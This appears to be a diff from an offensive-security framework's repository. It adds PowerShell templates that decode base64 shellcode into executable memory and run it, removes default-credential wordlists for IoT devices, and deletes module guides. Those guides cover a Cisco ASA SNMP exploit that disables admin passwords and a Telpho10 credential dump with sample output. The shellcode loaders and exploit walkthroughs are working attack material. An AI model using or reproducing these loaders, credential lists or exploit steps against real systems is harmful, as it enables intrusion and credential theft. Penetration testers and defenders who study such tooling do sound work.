+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
@@ -0,0 +1,20 @@
+$%{var_syscode} = @"
+[DllImport("kernel32.dll")]
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("msvcrt.dll")]
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
+"@
+
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
+
+%{shellcode}
+
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
+
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
+  $%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
+}
+
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
@@ -0,0 +1,27 @@
+function %{func_get_proc_address} {
+	Param ($%{var_module}, $%{var_procedure})		
+	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+	
+	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+}
+
+function %{func_get_delegate_type} {
+	Param (
+		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+	)
+	
+	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	
+	return $%{var_type_builder}.CreateType()
+}
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+		
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
@@ -50,7 +50,7 @@ shdr:
  dd    0                          ; sh_link
  dd    0                          ; sh_info
  dq    8                          ; sh_addralign
-  dq    7                          ; sh_entsize
+  dq    dynsz                      ; sh_entsize
 shentsize equ $ - shdr
  dd    0                          ; sh_name
  dd    3                          ; sh_type = SHT_STRTAB
@@ -66,6 +66,9 @@ dynsection:
 ; DT_INIT
  dq    0x0c
  dq    _start
+; DT_HASH
+  dq    0x04
+  dq    0
 ; DT_STRTAB
  dq    0x05
  dq    strtab
@@ -74,7 +77,7 @@ dynsection:
  dq    strtab
 ; DT_STRSZ
  dq    0x0a
-  dq    0
+  dq    strtabsz
 ; DT_SYMENT
  dq    0x0b
  dq    0
@@ -4722,4 +4722,3 @@ zxcvbn
 zxcvbnm
 zzzz
 zzzzzz
-vagrant
@@ -1212,33 +1212,3 @@ SQL
 CMOSPWD
 dadmin
 wlcsystem
-vagrant
-xc3511
-vizxv
-888888
-xmhdipc
-juantech
-54321
-666666
-klv123
-service
-666666
-888888
-ubnt
-klv1234
-Zte521
-hi3518
-jvbzd
-anko
-zlxx.
-7ujMko0vizxv
-7ujMko0admin
-ikwb
-dreambox
-user
-realtek
-1111111
-54321
-7ujMko0admin
-meinsm
-fucker
@@ -1785,36 +1785,3 @@ AURORA$JIS$UTILITY$
 wlcsystem wlcsystem
 news 
 CPRM 
-root xc3511
-root vizxv
-root 888888
-root xmhdipc
-root juantech
-root 123456
-root 54321
-root 1111
-root 666666
-root klv123
-service service
-admin1 password
-666666 666666
-888888 888888
-ubnt ubnt
-root klv1234
-root Zte521
-root hi3518
-root jvbzd
-root anko
-root zlxx.
-root 7ujMko0vizxv
-root 7ujMko0admin
-root ikwb
-root dreambox
-root user
-root realtek
-root 00000000
-admin 1111111
-admin 54321
-admin 7ujMko0admin
-admin meinsm
-mother fucker
@@ -913,8 +913,3 @@ AUTOLOG1
 AURORA$JIS$UTILITY$
 wlcsystem
 CPRM
-Admin1
-ubnt
-666666
-888888
-mother
@@ -16,4 +16,3 @@ xampp
 wampp
 ppmax2011
 turnkey
-vagrant
@@ -8,4 +8,3 @@ wampp xampp
 newuser wampp
 xampp-dav-unsecure ppmax2011 
 admin turnkey
-vagrant vagrant
@@ -11,4 +11,3 @@ sys
 wampp
 newuser
 xampp-dav-unsecure
-vagrant
@@ -1,43 +0,0 @@
-
-00000000
-1111
-1111111
-1234
-12345
-123456
-54321
-666666
-7ujMko0admin
-7ujMko0vizxv
-888888
-admin
-admin1234
-anko
-default
-dreambox
-fucker
-guest
-hi3518
-ikwb
-juantech
-jvbzd
-klv123
-klv1234
-meinsm
-pass
-password
-realtek
-root
-service
-smcadmin
-supervisor
-support
-system
-tech
-ubnt
-user
-vizxv
-xc3511
-xmhdipc
-zlxx.
-Zte521
@@ -1,15 +0,0 @@
-666666
-888888
-admin
-admin1
-administrator
-Administrator
-guest
-mother
-root
-service
-supervisor
-support
-tech
-ubnt
-user
@@ -1,60 +0,0 @@
-root xc3511
-root vizxv
-root admin
-admin admin
-root 888888
-root xmhdipc
-root default
-root juantech
-root 123456
-root 54321
-support support
-root 
-admin password
-root root
-root 12345
-user user
-admin 
-root pass
-admin admin1234
-root 1111
-admin smcadmin
-admin 1111
-root 666666
-root password
-root 1234
-root klv123
-Administrator admin
-service service
-supervisor supervisor
-guest guest
-guest 12345
-admin1 password
-administrator 1234
-666666 666666
-888888 888888
-ubnt ubnt
-root klv1234
-root Zte521
-root hi3518
-root jvbzd
-root anko
-root zlxx.
-root 7ujMko0vizxv
-root 7ujMko0admin
-root system
-root ikwb
-root dreambox
-root user
-root realtek
-root 00000000
-admin 1111111
-admin 1234
-admin 12345
-admin 54321
-admin 123456
-admin 7ujMko0admin
-admin pass
-admin meinsm
-tech tech
-mother fucker
@@ -88393,4 +88393,3 @@ z
 émigrés
 épée
 étude
-vagrant
@@ -49,4 +49,3 @@ root dbps
 root ibm
 root monitor
 root turnkey
-root vagrant
@@ -15,8 +15,8 @@
 /apidocs/
 /apidocs/allclasses-frame.html
 /apidocs/com/sap/engine/connector/connection/IConnection.html
-/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
 /apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
+/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
 /apidocs/com/sap/engine/deploy/manager/LoginInfo.html
 /ApplicationAdminProvider
 /bcb/
@@ -27,7 +27,6 @@
 /bcb/bcbadmSystemInfo.jsp
 /bcbtest/start.jsp
 /BI_UDC
-/BizcCommLayerAuthoring/Config?wsdl
 /BizcCommLayerAuthoring/Config1
 /BizcCommLayerAuthoring/Config1?wsdl
 /bwtest
@@ -36,7 +35,6 @@
 /CAFDataService/Config?wsdl
 /ccsui
 /CmcApp/logon.faces
-/CMSRTS/Config?wsdl
 /CMSRTS/Config1
 /CMSRTS/Config1?wsdl
 /com~tc~lm~webadmin~httpprovider~web
@@ -46,27 +44,22 @@
 /DataArchivingService
 /dispatcher
 /dswsbobje
-/dswsbobje/services/BICatalog?wsdl
 /dswsbobje/services/listServices
-/examples.html
+/dswsbobje/services/BICatalog?wsdl
 /examples/
 /examples_frame.html
+/examples.html
 /exchangeProfile/
 /GRMGHeartBeat
 /GRMGWSTest/service
 /GRMGWSTest/service?wsdl
 /guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
 /htmlb/
-/htmlb/docs/api/index.html
 /htmlb/index.html
-/htmlb/jsp/index.jsp
-/htmlb/moresamples.html
-/htmlb/samples.html
 /IciActionItemService/IciActionItemConf
 /IciActionItemService/IciActionItemConf?wsdl
 /IciChatLineService/IciChatLineConf
 /IciChatLineService/IciChatLineConf?wsdl
-/IciChatService/IciChatConf?wsdl
 /IciEventService/
 /IciEventService/IciEventConf
 /IciEventService/IciEventConf?wsdl
@@ -114,20 +107,15 @@
 /Lighthammer
 /logon
 /logon/index.jsp
-/logon/logonServlet
 /logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
 /logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
-/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
-/logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
 /main.html
 /meSync/HttpGRMGTest.html
 /mmr/
-/mmr/mmr/MMRUI.html
 /Modeler
 /modeller/
 /modeller/index.html
 /monitoring
-/monitoring/SystemInfo
 /nwa
 /OpenSQLMonitors/
 /PerformacetraceTraceApplication
@@ -147,63 +135,54 @@
 /samlssodemo_source
 /sap/
 /sap/admin
-/sap/admin/public/index.html
 /sap/bc/bsp/
 /sap/bc/bsp/esh_os_service/favicon.gif
 /sap/bc/bsp/sap
-/sap/bc/bsp/sap
 /sap/bc/bsp/sap/alertinbox
 /sap/bc/bsp/sap/bsp_dlc_frcmp
 /sap/bc/bsp/sap/bsp_veri
 /sap/bc/bsp/sap/bsp_verificatio
-/sap/bc/bsp/sap/bsp_verificatio
 /sap/bc/bsp/sap/bsp_wd_base
 /sap/bc/bsp/sap/bspwd_basics
 /sap/bc/bsp/sap/certmap
 /sap/bc/bsp/sap/certreq
 /sap/bc/bsp/sap/crm_bsp_frame
-/sap/bc/bsp/sap/crm_thtmlb_util
-/sap/bc/bsp/sap/crm_ui_frame
-/sap/bc/bsp/sap/crm_ui_start
 /sap/bc/bsp/sap/crmcmp_bpident/
 /sap/bc/bsp/sap/crmcmp_brfcase
 /sap/bc/bsp/sap/crmcmp_hdr
 /sap/bc/bsp/sap/crmcmp_hdr_std
 /sap/bc/bsp/sap/crmcmp_ic_frame
-/sap/bc/bsp/sap/esh_sap_link
+/sap/bc/bsp/sap/crm_thtmlb_util
+/sap/bc/bsp/sap/crm_ui_frame
+/sap/bc/bsp/sap/crm_ui_start
 /sap/bc/bsp/sap/esh_sapgui_exe
+/sap/bc/bsp/sap/esh_sap_link
 /sap/bc/bsp/sap/graph_bsp_test
 /sap/bc/bsp/sap/graph_bsp_test/Mimes
 /sap/bc/bsp/sap/gsbirp
 /sap/bc/bsp/sap/hrrcf_wd_dovru
 /sap/bc/bsp/sap/htmlb_samples
-/sap/bc/bsp/sap/htmlb_samples
-/sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/iccmp_bp_cnfirm
 /sap/bc/bsp/sap/iccmp_hdr_cntnr
 /sap/bc/bsp/sap/iccmp_hdr_cntnt
 /sap/bc/bsp/sap/iccmp_header
 /sap/bc/bsp/sap/iccmp_ssc_ll/
-/sap/bc/bsp/sap/it00
+/sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/it00
 /sap/bc/bsp/sap/it00/default.htm
 /sap/bc/bsp/sap/it00/http_client.htm
 /sap/bc/bsp/sap/it00/http_client_xml.htm
 /sap/bc/bsp/sap/public/bc
-/sap/bc/bsp/sap/public/bc
 /sap/bc/bsp/sap/public/graphics
 /sap/bc/bsp/sap/sam_demo
 /sap/bc/bsp/sap/sam_notifying
 /sap/bc/bsp/sap/sam_sess_queue
 /sap/bc/bsp/sap/sbspext_htmlb
-/sap/bc/bsp/sap/sbspext_htmlb                                                   
-/sap/bc/bsp/sap/sbspext_xhtmlb
 /sap/bc/bsp/sap/sbspext_xhtmlb
 /sap/bc/bsp/sap/spi_admin
 /sap/bc/bsp/sap/spi_monitor
 /sap/bc/bsp/sap/sxms_alertrules
 /sap/bc/bsp/sap/system
-/sap/bc/bsp/sap/system
 /sap/bc/bsp/sap/thtmlb_scripts
 /sap/bc/bsp/sap/thtmlb_styles
 /sap/bc/bsp/sap/uicmp_ltx
@@ -229,7 +208,6 @@
 /sap/bc/gui/sap/its/designs
 /sap/bc/gui/sap/its/webgui
 /sap/bc/IDoc_XML
-/sap/bc/Mi_host_http
 /sap/bc/MIDSD
 /sap/bc/Mime
 /sap/bc/MJC
@@ -239,6 +217,7 @@
 /sap/bc/MJC/mi_service
 /sap/bc/MJC/mi_services
 /sap/bc/MY_NEW_SERV99
+/sap/bc/Mi_host_http
 /sap/bc/ping
 /sap/bc/report
 /sap/bc/soap/ici
@@ -249,16 +228,15 @@
 /sap/bc/webdynpro/sap/apb_launchpad_nwbc
 /sap/bc/webdynpro/sap/apb_lpd_light_start
 /sap/bc/webdynpro/sap/apb_lpd_start_url
+/sap/bc/webdynpro/sap/application_exit
 /sap/bc/webdynpro/sap/appl_log_trc_viewer
 /sap/bc/webdynpro/sap/appl_soap_management
-/sap/bc/webdynpro/sap/application_exit
 /sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
 /sap/bc/webdynpro/sap/cnp_light_test
 /sap/bc/webdynpro/sap/configure_application
 /sap/bc/webdynpro/sap/configure_component
+/sap/bc/webdynpro/sap/esh_admin_ui_component
 /sap/bc/webdynpro/sap/esh_adm_smoketest_ui
-/sap/bc/webdynpro/sap/esh_admin_ui_component
-/sap/bc/webdynpro/sap/esh_admin_ui_component
 /sap/bc/webdynpro/sap/esh_eng_modelling
 /sap/bc/webdynpro/sap/esh_search_results.ui
 /sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
@@ -284,8 +262,8 @@
 /sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
 /sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
 /sap/bc/webdynpro/sap/hrrcf_a_tp_assess
-/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
 /sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
+/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
 /sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
 /sap/bc/webdynpro/sap/sh_adm_smoketest_files
 /sap/bc/webdynpro/sap/wd_analyze_config_appl
@@ -312,28 +290,26 @@
 /sap/es/saplink
 /sap/es/search
 /sap/IStest
+/sapmc/sapmc.html
 /sap/monitoring/
 /sap/public/bc
-/sap/public/bc                                                                  
 /sap/public/bc/icons
 /sap/public/bc/icons_rtl
 /sap/public/bc/its
 /sap/public/bc/its/designs
 /sap/public/bc/its/mimes
 /sap/public/bc/its/mimes/system/SL/page/hourglass.html
-/sap/public/bc/its/mimes/system/SL/page/hourglass.html
 /sap/public/bc/its/mobile/itsmobile00
 /sap/public/bc/its/mobile/itsmobile01
 /sap/public/bc/its/mobile/rfid
 /sap/public/bc/its/mobile/start
 /sap/public/bc/its/mobile/test
-/sap/public/bc/NW_ESH_TST_AUTO
 /sap/public/bc/NWDEMO_MODEL
+/sap/public/bc/NW_ESH_TST_AUTO
 /sap/public/bc/pictograms
 /sap/public/bc/sicf_login_run
 /sap/public/bc/trex
 /sap/public/bc/ur
-/sap/public/bc/ur
 /sap/public/bc/wdtracetool
 /sap/public/bc/webdynpro
 /sap/public/bc/webdynpro/adobechallenge
@@ -345,20 +321,14 @@
 /sap/public/bc/workflow/shortcut
 /sap/public/bsp
 /sap/public/bsp/sap
-/sap/public/bsp/sap
-/sap/public/bsp/sap/htmlb
 /sap/public/bsp/sap/htmlb
 /sap/public/bsp/sap/public
-/sap/public/bsp/sap/public                                                      
-/sap/public/bsp/sap/public/bc
 /sap/public/bsp/sap/public/bc
 /sap/public/bsp/sap/public/faa
 /sap/public/bsp/sap/public/graphics
 /sap/public/bsp/sap/public/graphics/jnet_handler
 /sap/public/bsp/sap/public/graphics/mimes
 /sap/public/bsp/sap/system
-/sap/public/bsp/sap/system
-/sap/public/bsp/sap/system_public
 /sap/public/bsp/sap/system_public
 /sap/public/icf_check
 /sap/public/icf_info
@@ -387,7 +357,6 @@
 /SAPIKS2/contentShow.sap
 /SAPIKS2/jsp/adminShow.jsp
 /SAPIrExtHelp
-/sapmc/sapmc.html
 /scripts/wgate
 /servlet/com.sap.admin.Critical.Actio
 /sim/
@@ -410,14 +379,10 @@
 /TXmla
 /uddi/
 /uddiclient
-/uddiclient/jsps/index.jsp
-/uddiclient/process/
 /useradmin
 /userhome
-/utl/UsageTypesInfo
 /VC
 /vscantest/
-/webdynpro/dispatcher
 /webdynpro/dispatcher/
 /webdynpro/dispatcher/sap.com/grc~accvwdcomp
 /webdynpro/dispatcher/sap.com/grc~aewebquery
@@ -438,12 +403,10 @@
 /webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
 /webdynpro/resources/sap.com/
 /webdynpro/welcome/Welcome.jsp
-/WSConnector/Config?wsdl
 /WSConnector/Config1
 /WSConnector/Config1?wsdl
 /wsd2wsdl
 /wsnavigator
-/wsnavigator/jsps/index.jsp
 /wsnavigator/jsps/redirect.jsp
 /wsnavigator/jsps/sendrequest.jsp
 /wsnavigator/jsps/test.jsp
@@ -4,4 +4,3 @@ role1
 root
 tomcat
 s3cret
-vagrant
@@ -6,4 +6,3 @@ ADMIN ADMIN
 xampp xampp
 tomcat s3cret
 QCC QLogic66
-admin vagrant
@@ -1005,4 +1005,3 @@ raspberry
 arcsight
 MargaretThatcheris110%SEXY
 karaf
-vagrant
@@ -109,4 +109,3 @@ www-data
 xpdb
 xpopr
 zabbix
-vagrant
@@ -11,7 +11,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema.define(version: 20161107203710) do
+ActiveRecord::Schema.define(version: 20160415153312) do

  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"
@@ -320,8 +320,7 @@ ActiveRecord::Schema.define(version: 20161107203710) do
    t.string   "jtr_format"
  end

-  add_index "metasploit_credential_privates", ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT ((type)::text = 'Metasploit::Credential::SSHKey'::text))", using: :btree
-  add_index "metasploit_credential_privates", ["type"], name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)", using: :btree
+  add_index "metasploit_credential_privates", ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, using: :btree

  create_table "metasploit_credential_publics", force: :cascade do |t|
    t.string   "username",   null: false
@@ -801,13 +800,12 @@ ActiveRecord::Schema.define(version: 20161107203710) do

  create_table "workspaces", force: :cascade do |t|
    t.string   "name"
-    t.datetime "created_at",                                      null: false
-    t.datetime "updated_at",                                      null: false
-    t.string   "boundary",           limit: 4096
-    t.string   "description",        limit: 4096
+    t.datetime "created_at",                                    null: false
+    t.datetime "updated_at",                                    null: false
+    t.string   "boundary",         limit: 4096
+    t.string   "description",      limit: 4096
    t.integer  "owner_id"
-    t.boolean  "limit_to_network",                default: false, null: false
-    t.boolean  "import_fingerprint",              default: false
+    t.boolean  "limit_to_network",              default: false, null: false
  end

 end
@@ -1,115 +0,0 @@
-## General notes
-
-This is using improved shellcode, has less stages than the Equation Group
-version making it more reliable. This makes the SNMP payload packet ~150 less
-bytes. Also, the leaked version only supports 8.x, we have it working on 9.x
-versions.
-
-To add more version specific offsets, more details and a Lina file offset
-finder are available at:
-
-https://github.com/RiskSense-Ops/CVE-2016-6366
-
-## Partial list of supported versions
------------------------------------------------------------
-All of the leaked versions are available in the module
-
- 8.x
- 8.0(2)
- 8.0(3)
- 8.0(3)6
- 8.0(4)
- 8.0(4)32
- 8.0(5)
- 8.2(1)
- 8.2(2)
- 8.2(3)
- 8.2(4)
- 8.2(5)
- 8.2(5)33 `*`
- 8.2(5)41 `*`
- 8.3(1)
- 8.3(2)
- 8.3(2)39 `*`
- 8.3(2)40 `*`
- 8.3(2)-npe `*` `**`
- 8.4(1)
- 8.4(2)
- 8.4(3)
- 8.4(4)
- 8.4(4)1 `*`
- 8.4(4)3 `*`
- 8.4(4)5 `*`
- 8.4(4)9 `*`
- 8.4(6)5 `*`
- 8.4(7) `*`
- 9.x
- 9.0(1) `*`
- 9.1(1)4 `*`
- 9.2(1) `*`
- 9.2(2)8 `*`
- 9.2(3) `*`
- 9.2(4) `*`
- 9.2(4)13 `*`
-
-`*` new version support not part of the original Shadow Brokers leak
-
-`**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?
-
-## Verification
-
- Start `msfconsole`
- `use auxiliary/admin/cisco/cisco_asa_extrabacon`
- `set RHOST x.x.x.x`
- `check`
- `run`
- ssh admin@x.x.x.x, you will not need a valid password
- `set MODE pass-enable`
- `run`
- ssh admin@x.x.x.x, ensure fake password does not work
-
-## Checking for a vulnerable version
-
-```
-msf > use auxiliary/admin/cisco/cisco_asa_extrabacon
-msf auxiliary(cisco_asa_extrabacon) > set rhost 192.168.1.1
-rhost => 192.168.1.1
-msf auxiliary(cisco_asa_extrabacon) > check
-
-[+] Payload for Cisco ASA version 8.2(1) available!
-[*] 192.168.1.1:161 The target appears to be vulnerable.
-```
-
-## Disabling administrative password
-
-```
-  msf auxiliary(cisco_asa_extrabacon) > set
-set ACTION            set ConsoleLogging    set Prompt            set RHOST             set TimestampOutput
-set CHOST             set LogLevel          set PromptChar        set RPORT             set VERBOSE
-set COMMUNITY         set MODE              set PromptTimeFormat  set SessionLogging    set VERSION
-set CPORT             set MinimumRank       set RETRIES           set TIMEOUT           set WORKSPACE
-msf auxiliary(cisco_asa_extrabacon) > set MODE pass-
-  set MODE pass-disable  set MODE pass-enable
-msf auxiliary(cisco_asa_extrabacon) > set MODE pass-disable
-MODE => pass-disable
-msf auxiliary(cisco_asa_extrabacon) > run
-
-[*] Building pass-disable payload for version 8.2(1)...
-  [*] Sending SNMP payload...
-  [+] Clean return detected!
-[!] Don't forget to run pass-enable after logging in!
-[*] Auxiliary module execution completed
-```
-
-## Re-enabling administrative password
-
-```
-msf auxiliary(cisco_asa_extrabacon) > set MODE pass-enable
-MODE => pass-enable
-msf auxiliary(cisco_asa_extrabacon) > run
-
-[*] Building pass-enable payload for version 8.2(1)...
-  [*] Sending SNMP payload...
-  [+] Clean return detected!
-[*] Auxiliary module execution completed
-```
@@ -1,133 +0,0 @@
-## Vulnerable Application
-
-  Telpho10 v2.6.31 (32-bit Linux ISO image download [here](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso)).
-
-  Supporting documentation for this product can be found [here](http://www.telpho.de/downloads.php).
-
-## Verification Steps
-
-  The following steps will allow you to install and dump the credentials from a Telpho10 instance:
-
-  1. Download the [Telpho10 ISO image](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso) and install in a VM (or on a system)
-    - note that the ISO will default to a German keyboard layout
-    - note that the ISO expects a SATA hard drive (not IDE/PATA) for installation
-  1. configure the Telpho10's IP address
-    - edit /etc/networks/interfaces accordingly
-  1. Start msfconsole
-  1. Do: ```use auxiliary/admin/http/telpho10_credential_dump```
-  1. Do: ```set RHOST <IP address of your Telpho10 instance> ```
-  1. Do: ```run```
-  1. You should see a list of the retrieved Telpho10 credentials
-
-## Scenarios
-
-  Example output when using this against a Telpho10 v2.6.31 VM:
-
-  ```
-$ ./msfconsole
-                                                  
-# cowsay++
- ____________
-< metasploit >
- ------------
-       \   ,__,
-        \  (oo)____
-           (__)    )\
-              ||--|| *
-
-
-       =[ metasploit v4.12.36-dev-16fc6c1                 ]
-+ -- --=[ 1596 exploits - 908 auxiliary - 273 post        ]
-+ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
-+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
-
-msf > use auxiliary/admin/http/telpho10_credential_dump
-msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
-RHOST => 10.0.2.35
-msf auxiliary(telpho10_credential_dump) > run
-
-[*] Generating backup
-[*] Downloading backup
-[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
-[*] Dumping credentials
-
-[*] Login (/telpho/login.php)
-[*] -------------------------
-[+] Username: admin
-[+] Password: telpho
-
-[*] MySQL (/phpmyadmin)
-[*] -------------------
-[+] Username: root
-[+] Password: telpho
-
-[*] LDAP (/phpldapadmin)
-[*] --------------------
-[+] Username: cn=admin,dc=localdomain
-[+] Password: telpho
-
-[*] Asterisk MI (port 5038)
-[*] -----------------------
-[+] Username: telpho
-[+] Password: telpho
-
-[*] Mail configuration
-[*] ------------------
-[+] Mailserver: 
-[+] Username:   
-[+] Password:   
-[+] Mail from:  
-
-[*] Online Backup
-[*] -------------
-[+] ID:       
-[+] Password: 
-
-[*] Auxiliary module execution completed
-msf auxiliary(telpho10_credential_dump) > 
-```
-
-I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:
-
-```
-msf auxiliary(telpho10_credential_dump) > run
-
-[*] Generating backup
-[*] Downloading backup
-[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
-[*] Dumping credentials
-
-[*] Login (/telpho/login.php)
-[*] -------------------------
-[+] Username: admin
-[+] Password: s3cr3t
-
-[*] MySQL (/phpmyadmin)
-[*] -------------------
-[+] Username: root
-[+] Password: telpho
-
-[*] LDAP (/phpldapadmin)
-[*] --------------------
-[+] Username: cn=admin,dc=localdomain
-[+] Password: ldaps3cr3t
-
-[*] Asterisk MI (port 5038)
-[*] -----------------------
-[+] Username: telpho
-[+] Password: asterisks3cr3t
-
-[*] Mail configuration
-[*] ------------------
-[+] Mailserver: 
-[+] Username:   
-[+] Password:   
-[+] Mail from:  
-
-[*] Online Backup
-[*] -------------
-[+] ID:       
-[+] Password: 
-
-[*] Auxiliary module execution completed 
-  ```
@@ -1,214 +0,0 @@
-The module use the Censys REST API to access the same data accessible through web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
-
-## Verification Steps
-
-1. Do: `use auxiliary/gather/censys_search`
-2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
-3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
-4. Do: `set CENSYS_SEARCHTYPE certificates`
-5: Do: `set CENSYS_DORK rapid7`
-6: Do: `run`
-
-## Sample Output
-
-#### Certificates Search
-
-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE certificates
-CENSYS_SEARCHTYPE => certificates
-...
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
